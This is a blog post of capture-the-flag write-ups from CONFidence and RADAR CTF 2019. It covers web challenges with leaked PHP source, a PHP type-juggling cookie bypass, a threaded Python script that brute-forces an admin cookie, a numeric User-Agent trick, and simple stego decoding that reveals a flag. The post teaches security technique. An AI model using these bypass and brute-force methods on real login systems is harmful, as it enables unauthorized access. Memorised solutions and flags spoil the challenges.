Today I bring you the resolution of some simple challenges of CTF – Capture The Flag (in Spanish, Captura la Bandera).
The CTF are computer challenges focused on security, with which we will test our knowledge and learn new techniques.
Since few weeks ago I’m part of Ripp3rs and we compete through Ctftime.org
We are going to solve some of the CTF challenges.
Web
Teaser CONFidence CTF 2019 – My admin panel
Statement
I think I’ve found something interesting, but I’m not really a PHP expert. Do you think it’s exploitable?
https://gameserver.zajebistyc.tf/admin/
Solution
We visited the url and found the php code that the page uses.
We download the file login.php.bak and we can review the source code:
<?php include '../func.php'; include '../config.php'; if (!$_COOKIE['otadmin']) { exit("Not authenticated.\n"); } if (!preg_match('/^{"hash": [0-9A-Z\"]+}$/', $_COOKIE['otadmin'])) { echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n"; exit(); } $session_data = json_decode($_COOKIE['otadmin'], true); if ($session_data === NULL) { echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n"; exit(); } if ($session_data['hash'] != strtoupper(MD5($cfg_pass))) { echo("I CAN EVEN GIVE YOU A HINT XD \n"); for ($i = 0; i < strlen(MD5('xDdddddd')); i++) { echo(ord(MD5($cfg_pass)[$i]) & 0xC0); } exit("\n"); } display_admin(); ?>
Let’s intercept the request with Burp Suite to make the process of obtaining the hint (line 17).
We must create an cookie ‘otadmin’ with the format otadmin = {“hash”: “MD5”}
The key of the hint is: ord(MD5($cfg_pass)[$i]) & 0xC0
0006464640640064000646464640006400640640646400 ord(i) & 0xC0 == 0 → if i is a number ord(i) & 0xC0 == 64 → if i is a letter
So we know that the first 3 characters of the correct MD5 are numbers. It does a loose comparation (https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf)
So we only need to find the first 3 characters of the MD5. Let’s use a python script:
#!/usr/bin/env python3 import requests import threading import time import os def brute(sol): data = {'otadmin': '{"hash": %s}' % sol} r = requests.get('http://gameserver.zajebistyc.tf/admin/login.php', cookies=data) if '0006464640640064000646464640006400640640646400' not in r.text: print('[+] Solution: ' + str(sol), flush=True) print(r.text) os._exit(1) else: pass for i in range(99, 999): thread1 = threading.Thread(target=brute, args=[i,]) thread1.start() time.sleep(0.05)
We execute it and we get the flag.
RADAR CTF 2019 – Puzzle
Statement
We love puzzle and we put a small puzzle for you ..
If you can’t solve it study some math and come back again
——————————————–
Challenge’s URL :
http://blackfoxs.org/radar/puzzle
Solution
Let’s visit the url:
Let’s review the code of the page:
We see these lines <!– don’t forget to remove /puzzle_code_file.zip –>
In the puzzle_code_file.zip file we obtain the source code of the index.php, you can check it whole in Puzzle – index.php
The most important part:
<?php $puzzle = $_SERVER['HTTP_USER_AGENT']; if (is_numeric($puzzle)){ if (strlen($puzzle) < 4){ if ($puzzle > 10000){
As you can see we must have a numeric User-agent greater than 10000 with less than 4 characters.
After a few laps, a solution is: 9e9
Using a python script:
#!/usr/bin/env python import requests import re url = 'http://blackfoxs.org/radar/puzzle/' headers = { 'User-Agent': '9e9', } r = requests.get(url, headers=headers) m = re.search('id="desc">(.+?)</h2>', r.text) if m: found = m.group(1) print found
RADAR CTF 2019 – Easy Web
Statement
It’s easy
——————————————–
Challenge’s URL :
http://blackfoxs.org/radar/easyweb
Solution
In the source code of http://blackfoxs.org/radar/easyweb we see: <!– index.php?secretword= –>.
After some tries we get the flag on http://blackfoxs.org/radar/easyweb/index.php?secretword=radar
Cryptography y stego
RADAR CTF 2019 – Black
Statement
Just a black photo ..
File: black.jpg
Solution
We can solve this challenge easily Stegsolve
RADAR CTF 2019 – Blanks
Statement
Maybe it’s not blank
File: flag.txt
Solution
It looks like an empty text file, but if we open it with a hexadecimal viewer we see:
Let’s convert it to binary strong>, let’s replace the 09 to 0 and the 20 to 1. We can use a python script:
#!/usr/bin/env python import binascii def decode_binary_string(s): return ''.join(chr(int(s[i*8:i*8+8],2)) for i in range(len(s)//8)) f = open('flag.txt', 'rb') hex_flag = f.read().encode('hex') binary = hex_flag.replace('09', '0').replace('20', '1') print decode_binary_string(binary) + '}' # radar{blanks_but_not_blankz}
Leave a Reply